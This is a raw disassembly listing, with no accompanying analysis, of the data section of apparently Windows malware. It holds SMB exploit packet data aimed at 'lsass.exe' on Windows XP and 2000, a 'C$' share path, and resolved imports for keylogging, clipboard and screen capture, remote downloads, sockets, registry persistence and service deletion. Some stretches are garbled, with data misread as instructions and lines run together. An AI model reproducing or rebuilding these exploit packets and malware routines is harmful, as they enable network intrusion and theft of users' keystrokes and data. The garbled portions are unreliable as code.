dd 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh, 0FAF6EAFCh
dd 99EDFCF2h, 0
dword_431C70 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:00415B7F�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_431D00 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415BB1�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_431DB0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415BDC�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_431E90 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0041591F�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_5: ; DATA XREF: .text:00415962�o
unicode 0, <C$>,0
a?????_0 db '?????',0
dd 2 dup(0)
dword_431EF8 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415C34�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_431F68 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415C5F�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_432010 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415C93�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_432090 dd offset loc_401495 ; DATA XREF: .text:00415CC3�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_407079+3
dd 1, 0
dd 1, 0
dd offset loc_407079+3
dd 1, 0
dd 1, 0
dd offset loc_407079+3
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_432128 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415CF5�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_432198 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00415D1A�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_432210 dd 0 dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 0
dd offset loc_40A89A
dd 1, 0
dd 1, 3 dup(0)
aWinxpProfess_0 db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_4322D0 dd 1004600h ; .text:00415A3A�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0
dd 9875h, 9873h
off_432358 dd offset sub_41728D ; DATA XREF: sub_4182EB�r
dd offset nullsub_1
dd offset nullsub_1
align 10h
dword_432370 dd 19930520h, 3 dup(0) ; sub_417E36+2�o
off_432380 dd offset sub_418434 ; DATA XREF: sub_41865A+1C�r
dword_432384 dd 2 ; sub_41DADE+E�r ...
off_432388 dd offset aNull_1 ; DATA XREF: sub_418A1C:loc_418DE2�r
; sub_418A1C+4E4�r
; "(null)"
off_43238C dd offset aNull ; DATA XREF: sub_418A1C+2AC�r
; "(null)"
dword_432390 dd 3 ; sub_4191B1+16�w ...
align 10h
dd 43h, 0
dword_4323A8 dd 1, 8 dup(0) ; .text:off_4323FC�o
dd 2 dup(1), 3 dup(0)
dd offset off_432D84
align 10h
dd offset word_42C17A
dd offset off_432CC8
dd 0
off_4323FC dd offset dword_4323A8 ; DATA XREF: sub_416C7A+A�r
; sub_4174C6+1C�r ...
dd 0
dd 1, 8 dup(0)
dd 43h, 21h dup(0)
dd 43h, 20h dup(0)
dd 10h
off_432538 dd offset dword_4811E0 ; DATA XREF: sub_41A0A4:loc_41A0E1�w
; sub_41A0ED+8�o ...
dword_43253C dd 1 dd offset dword_4811F8
dd 1, 2 dup(0)
dd offset dword_481210
dd 1, 481228h, 1, 2 dup(0)
dd offset dword_481240
dd 1, 481258h, 1, 481270h, 1, 2 dup(0)
dd offset dword_481288
dd 1, 2 dup(0)
dd offset dword_4812A0
dd 1, 4812B8h, 1, 4812D0h, 1, 2 dup(0)
dd offset dword_4812E8
dd 1, 481300h, 1, 481318h, 1, 22h dup(0)
off_432658 dd offset dword_481960 ; DATA XREF: sub_41A0ED+2A�o
; sub_41A0ED+4A�o ...
align 10h
dd offset dword_481960
dd 101h
dword_432668 dd 0FFFFFFFFh, 0 dd 1000h, 0
dword_432678 dd 3 dup(0) ; sub_41C5A4+12�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_432698 dd 3 dup(0) ; sub_41C5A4:loc_41C5C2�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_4326C8 dd 7Ch dup(0) dword_4328B8 dd 8 dup(0) ; sub_41B154+D�o
dword_4328D8 dd 2 dup(0) dword_4328E0 dd 1 dword_4328E4 dd 16h dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
off_432A48 dd offset sub_41BF0E ; DATA XREF: sub_417255+5�w
; sub_418A1C+43E�r
off_432A4C dd offset sub_41BB88 ; DATA XREF: sub_417255+A�w
; sub_418A1C+46A�r
off_432A50 dd offset sub_41BBED ; DATA XREF: sub_417255+14�w
; sub_4192C5+40D�r
off_432A54 dd offset sub_41BB4C ; DATA XREF: sub_417255+1E�w
; sub_418A1C+459�r
off_432A58 dd offset sub_41BBD3 ; DATA XREF: sub_417255+28�w
off_432A5C dd offset sub_41BF0E ; DATA XREF: sub_417255+32�w
off_432A60 dd offset word_42C17A ; DATA XREF: sub_4175DA:loc_4176AC�r
; sub_418A1C:loc_418C1B�r ...
off_432A64 dd offset word_42C382 ; DATA XREF: sub_421CA3+18�r
dword_432A68 dd 3789D824h ; sub_418A1C+9�r ...
dd offset loc_4206A7
off_432A70 dd offset sub_41CEC1 ; DATA XREF: sub_41CEF6+C�r
align 10h
byte_432A80 db 1 ; DATA XREF: sub_41D1D5+C8�r
db 2, 4, 8
align 8
dword_432A88 dd 3A4h dword_432A8C dd 82798260h dd 21h, 0
dword_432A98 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_432B78 dd 2 ; sub_41D967+32�r
off_432B7C dd offset aR6002FloatingP ; DATA XREF: sub_41D967+DE�r
; sub_41D967+11B�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 42C90Ch, 9, 42C8E0h, 0Ah, 42C848h, 10h, 42C81Ch
dd 11h, 42C7ECh, 12h, 42C7C8h, 13h, 42C79Ch, 18h, 42C764h
dd 19h, 42C73Ch, 1Ah, 42C704h, 1Bh, 42C6CCh, 1Ch, 42C6A4h
dd 78h, 42C694h, 79h, 42C684h, 7Ah, 42C674h, 0FCh, 4239E8h
dd 0FFh, 42C664h
dword_432C08 dd 0C0000005h, 0Bh, 0 ; sub_419240+47�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_432C80 dd 3 ; sub_41DB17+A3�r ...
dword_432C84 dd 7 ; sub_41DB17+A9�r ...
dd 78h
dword_432C8C dd 0Ah ; sub_4213C5�r
dword_432C90 dd 0FFFFFFFFh, 0A80h, 7 dup(0) ; sub_41B1A6:loc_41B22C�o
dword_432CB4 dd 1 byte_432CB8 db 2Eh ; DATA XREF: sub_4192C5:loc_4195D0�r
; sub_4192C5+329�r ...
align 4
dd 1, 432CC8h, 0
off_432CC8 dd offset aSun ; DATA XREF: .text:004323F4�o
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
; ---------------------------------------------------------------------------
cld
retf 42h
; ---------------------------------------------------------------------------
clc
retf 42h
; ---------------------------------------------------------------------------
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
; ---------------------------------------------------------------------------
fmul st, st(2)
inc edx
add ah, cl
retf 42h
; ---------------------------------------------------------------------------
ror dl, 42h
add [eax-53FFBD36h], bh
retf 42h
; ---------------------------------------------------------------------------
test al, 0CAh
inc edx
add [edx+ecx*8-355FFFBEh], ah
inc edx
add [edx+ecx*8-3567FFBEh], bl
inc edx
add [edx+ecx*8-356FFFBEh], dl
inc edx
add [edx+ecx*8-3577FFBEh], cl
inc edx
add [edx+ecx*8-357FFFBEh], al
inc edx
add [edx+ecx*8+42h], bh
add [edx+ecx*8+42h], dh
add [eax-36h], ch
inc edx
add [eax-36h], ah
inc edx
add [eax-36h], bl
inc edx
add [eax+500042CAh], bl
retf 42h
; ---------------------------------------------------------------------------
dec eax
retf 42h
; ---------------------------------------------------------------------------
inc eax
retf 42h
; ---------------------------------------------------------------------------
xor al, 0CAh
inc edx
add [edx+ecx*8], ch
inc edx
add [eax], ah
retf 42h
; ---------------------------------------------------------------------------
adc al, 0CAh
inc edx
add ds:35200042h[esi], bl
inc edx
add [eax], cl
retf 42h
; ---------------------------------------------------------------------------
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset aHhMmSs ; "HH:mm:ss"
dd 409h, 1, 0
dword_432D80 dd 2Eh off_432D84 dd offset dword_432D80 ; DATA XREF: sub_41EC9A+15�r
; .text:004323E0�o ...
off_432D88 dd offset dword_481460 ; DATA XREF: sub_41EC9A+32�r
off_432D8C dd offset dword_481460 ; DATA XREF: sub_41EC9A+4E�r
off_432D90 dd offset dword_481460 ; DATA XREF: sub_41ECF9+1B�r
off_432D94 dd offset dword_481460 ; DATA XREF: sub_41ECF9+38�r
off_432D98 dd offset dword_481460 ; DATA XREF: sub_41ECF9+55�r
off_432D9C dd offset dword_481460 ; DATA XREF: sub_41ECF9+72�r
off_432DA0 dd offset dword_481460 ; DATA XREF: sub_41ECF9+8F�r
off_432DA4 dd offset dword_481460 ; DATA XREF: sub_41ECF9+AC�r
off_432DA8 dd offset dword_481460 ; DATA XREF: sub_41ECF9+C8�r
dd 2 dup(7F7F7F7Fh)
off_432DB4 dd offset off_432D84 ; DATA XREF: sub_41EC9A+B�r
; sub_41EC9A+27�r ...
align 10h
dd 1, 3 dup(0)
dword_432DD0 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFhdword_432DE8 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh, 7080h, 1, 0FFFFF1F0h
; DATA XREF: sub_41FF3F�o
dd 0
dword_432E10 dd 545350h, 0Fh dup(0)dword_432E50 dd 544450h, 0Fh dup(0) dd offset dword_432E10
dd offset dword_432E50
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch, 2 dup(0)
dword_432F20 dd 2 dup(0) dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_433080 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_42186B+26�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
dword_4331E0 dd 0 ; sub_4017E8+CF�w ...
dword_4331E4 dd 0 ; sub_401B94+F2�w ...
dd 3E6h dup(0)
dword_434180 dd 6 dup(0) ; sub_40195E+129�o ...
dword_434198 dd 0 ; sub_401141+355�o
dword_43419C dd 0A2h dup(0) dword_434424 dd 41h dup(0) dword_434528 dd 0 ; sub_401141+303�r
align 10h
dword_434530 dd 0 ; sub_401141+367�r
dword_434534 dd 0 dword_434538 dd 0 dword_43453C dd 0 dd 0
dword_434544 dd 0 dword_434548 dd 0 ; sub_401141+20F�r ...
dword_43454C dd 41h dup(0) dword_434650 dd 41h dup(0) dword_434754 dd 0 ; sub_401141+25B�r
dword_434758 dd 0 dword_43475C dd 0 ; sub_401141+209�r
dword_434760 dd 20h dup(0) ; sub_401141+1F4�o
dword_4347E0 dd 0 dword_4347E4 dd 0 ; sub_401141+1FE�w
dword_4347E8 dd 0 align 10h
dword_4347F0 dd 0 ; sub_401141+FF�o
dword_4347F4 dd 41h dup(0) dword_4348F8 dd 41h dup(0) dword_4349FC dd 0 ; sub_401141+111�r
dword_434A00 dd 0 dword_434A04 dd 0 ; sub_401141+CC�r
dword_434A08 dd 20h dup(0) ; sub_401141+B7�o
dword_434A88 dd 0 dword_434A8C dd 0 ; sub_401141+C1�w
dword_434A90 dd 0 align 8
dword_434A98 dd 1ECh dup(0) ; sub_401FAF�o ...
db 0
byte_435249 db 3 dup(0) ; DATA XREF: .text:off_4276E8�o
dd 0E13h dup(0)
dword_438A98 dd 0 ; sub_401FAF+E�o ...
dword_438A9C dd 0Dh dup(0) dword_438AD0 dd 2 dup(0) dword_438AD8 dd 200h dup(0) ; sub_403B79+97�o ...
dword_4392D8 dd 0 ; resolved to->NTDLL.ZwQuerySystemInformation ; sub_403852+65�r ...
dword_4392DC dd 0 ; resolved to->NTDLL.RtlRunDecodeUnicodeString ; sub_403D30+53�r ...
dword_4392E0 dd 200h dup(0) ; sub_403B79+AE�o ...
dword_439AE0 dd 0 ; resolved to->NTDLL.RtlCreateQueryDebugBuffer ; sub_403E31+85�w
dword_439AE4 dd 0 ; resolved to->NTDLL.RtlQueryProcessDebugInformation ; sub_403E31+92�w
dword_439AE8 dd 0 ; resolved to->NTDLL.RtlDestroyQueryDebugBuffer ; sub_403852+173�r ...
dword_439AEC dd 0 ; sub_403C9E+2F�r ...
dword_439AF0 dd 0 ; sub_403B79+FF�w
dword_439AF4 dd 0 ; sub_403B79+105�w ...
dword_439AF8 dd 0 ; sub_403C9E+49�r
align 10h
dword_439B00 dd 80h dup(0) dword_439D00 dd 80h dup(0) dword_439F00 dd 0 ; sub_404193+51�r ...
dword_439F04 dd 0 ; sub_4042A2+6A�w ...
byte_439F08 db 0 ; DATA XREF: sub_4059CE+11E�w
; sub_4059CE+220�o
align 2
word_439F0A dw 0 ; DATA XREF: sub_4059CE+12B�w
word_439F0C dw 0 ; DATA XREF: sub_4059CE+136�w
word_439F0E dw 0 ; DATA XREF: sub_4059CE+13F�w
byte_439F10 db 0 ; DATA XREF: sub_4059CE+145�w
byte_439F11 db 0 ; DATA XREF: sub_4059CE+14C�w
word_439F12 dw 0 ; DATA XREF: sub_4059CE+153�w
dword_439F14 dd 0 ; sub_4059CE+19B�w
dword_439F18 dd 0 byte_439F1C db 0 ; DATA XREF: sub_4059CE+1B2�w
byte_439F1D db 0 ; DATA XREF: sub_4059CE+1C2�w
word_439F1E dw 0 ; DATA XREF: sub_4059CE+1D5�w
word_439F20 dw 0 ; DATA XREF: sub_4059CE+1E7�w
word_439F22 dw 0 ; DATA XREF: sub_4059CE+1DD�w
dword_439F24 dd 100h dup(0) dword_43A324 dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_40402D+F8�r ...
dword_43A328 dd 71AB951Eh ; resolved to->WS2_32.getsockname ; sub_406217+786�r ...
dword_43A32C dd 5B8A3009h ; sub_406217+A08�r ...
dword_43A330 dd 42C41384h ; resolved to->WININET.InternetCrackUrlA ; sub_406217+88E�r ...
dword_43A334 dd 71AB8769h ; resolved to->WS2_32.WSASocketA ; sub_406217+522�w ...
dword_43A338 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; sub_406217+84F�r ...
dword_43A33C dd 7C8214E3h ; resolved to->KERNEL32.GetDriveTypeA ; sub_406217+8C�w ...
dword_43A340 dd 7E430225h ; resolved to->USER32.CloseClipboard ; sub_406217+1E2�r ...
dword_43A344 dd 7E41B933h ; resolved to->USER32.IsWindow ; sub_402402+69�r ...
dword_43A348 dd 71AB2D0Fh ; resolved to->WS2_32.recvfrom ; sub_406217+756�r ...
dword_43A34C dd 77F15B80h ; resolved to->GDI32.SelectObject ; sub_406217+46F�w ...
dword_43A350 dd 71B25099h ; sub_414277+A3�r
dword_43A354 dd 71AB4519h ; resolved to->WS2_32.ioctlsocket ; sub_40558B+B1�r ...
dword_43A358 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_406217+855�r
dword_43A35C dd 7E430237h ; resolved to->USER32.OpenClipboard ; sub_406217+1D2�r ...
dword_43A360 dd 7E41F3B3h ; resolved to->USER32.GetAsyncKeyState ; sub_406217+206�w ...
dword_43A364 dd 7C863F58h ; resolved to->KERNEL32.Process32Next ; sub_406217+CA�r ...
dword_43A368 dd 5B897BE9h ; sub_406217+9F8�r ...
dword_43A36C dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_40402D+8D�r ...
dword_43A370 dd 7E43212Bh ; resolved to->USER32.GetWindowTextA ; sub_405F16+77�r ...
dword_43A374 dd 7432FF6Bh ; sub_406217+C00�r
dword_43A378 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExA ; sub_406217+2D6�r
dword_43A37C dd 71AC1028h ; resolved to->WS2_32.accept ; sub_406217+640�w ...
dword_43A380 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindow ; sub_405F16+62�r ...
dword_43A384 dd 74327E4Dh dword_43A388 dd 5B894160h ; sub_406217+A10�r ...
dword_43A38C dd 71AB2C69h ; resolved to->WS2_32.sendto ; sub_4059CE+228�r ...
dword_43A390 dd 7CA235CBh ; resolved to->SHELL32.SHChangeNotifydword_43A394 dd 7C80AC0Fh ; resolved to->KERNEL32.SetErrorMode ; sub_406217+AD�r ...
dword_43A398 dd 71B2547Ah ; sub_406217+B30�r ...
dword_43A39C dd 5B894541h ; sub_406217+A20�r ...
dword_43A3A0 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExA ; sub_406217+298�w ...
dword_43A3A4 dd 5B86FDE8h ; sub_406217+9DB�r ...
dword_43A3A8 dd 5B86AA41h ; sub_406217+A28�r ...
dword_43A3AC dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshot ; sub_406217+BA�r ...
dword_43A3B0 dd 77E37311h ; resolved to->ADVAPI32.DeleteService ; sub_406217+3C1�r ...
dword_43A3B4 dd 7E41DAEAh ; resolved to->USER32.DestroyWindow ; sub_4025FE+24D�r ...
dword_43A3B8 dd 7C83039Bh ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_406217+72�w ...
dword_43A3BC dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_40402D+45�r ...
dword_43A3C0 dd 5B86FEB8h ; sub_406217+9E8�r ...
dword_43A3C4 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_406217+82E�w ...
dword_43A3C8 dd 76D69962h ; resolved to->IPHLPAPI.GetIpNetTable ; sub_406217+AB7�r ...
dword_43A3CC dd 71AB664Dh ; resolved to->WS2_32.WSAStartup ; sub_40503C+16�r ...
dword_43A3D0 dd 5B8A5199h ; sub_40822F+72�r
dword_43A3D4 dd 7C864230h ; resolved to->KERNEL32.Module32First ; sub_408D49+15C�r ...
dword_43A3D8 dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; sub_4059CE+76�r ...
dword_43A3DC dd 7C8217EAh ; resolved to->KERNEL32.SearchPathA ; sub_406217+EA�r ...
dword_43A3E0 dd 74344AE7h ; sub_406217+C10�r
dword_43A3E4 dd 42C24399h ; resolved to->WININET.HttpOpenRequestA ; sub_406217+86A�r ...
dword_43A3E8 dd 77F16E6Fh ; resolved to->GDI32.DeleteDC ; sub_4021C5+219�r ...
dword_43A3EC dd 77DE5E4Dh ; resolved to->ADVAPI32.CloseServiceHandle ; sub_406217+3C9�r ...
dword_43A3F0 dd 73B81E3Bh ; sub_4025FE+2B�r ...
dword_43A3F4 dd 42C249F2h ; resolved to->WININET.InternetConnectA ; sub_406217+87A�r ...
dword_43A3F8 dd 5B867750h ; sub_406217+A00�r ...
dword_43A3FC dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueA ; sub_406217+2B2�w ...
dword_43A400 dd 71AC0B50h ; resolved to->WS2_32.getpeername ; sub_410970+E3�r
dword_43A404 dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_406217+F2�r
dword_43A408 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExA ; sub_406217+28B�w ...
dword_43A40C dd 7C863DE5h ; resolved to->KERNEL32.Process32First ; sub_406217+C2�r ...
dword_43A410 dd 76D64D5Eh ; resolved to->IPHLPAPI.IcmpCreateFile ; sub_406217+910�r ...
dword_43A414 dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSet ; sub_406217+53C�w ...
dword_43A418 dd 7E42DE87h ; resolved to->USER32.FindWindowA ; sub_406217+1BA�r ...
dword_43A41C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandle ; sub_406217+85B�w ...
dword_43A420 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_406217+796�r ...
dword_43A424 dd 76F37ABDh ; resolved to->DNSAPI.DnsFlushResolverCacheEntry_Adword_43A428 dd 77DFC534h ; resolved to->ADVAPI32.AdjustTokenPrivileges ; sub_408CDE+55�r
dword_43A42C dd 76D6A195h ; resolved to->IPHLPAPI.DeleteIpNetEntry ; sub_4087B6+98�r
dword_43A430 dd 77F15A7Ah ; resolved to->GDI32.GetDeviceCaps ; sub_4021C5+3D�r ...
dword_43A434 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_40402D+25�r ...
dword_43A438 dd 77F15FF0h ; resolved to->GDI32.CreateCompatibleDC ; sub_406217+448�w ...
dword_43A43C dd 77F16C0Ah ; resolved to->GDI32.DeleteObject ; sub_406217+496�w
dword_43A440 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_40195E+77�r ...
dword_43A444 dd 76D64D33h ; resolved to->IPHLPAPI.IcmpCloseHandle ; sub_406217+91D�r ...
dword_43A448 dd 77F16F89h ; resolved to->GDI32.BitBlt ; sub_406217+47C�w ...
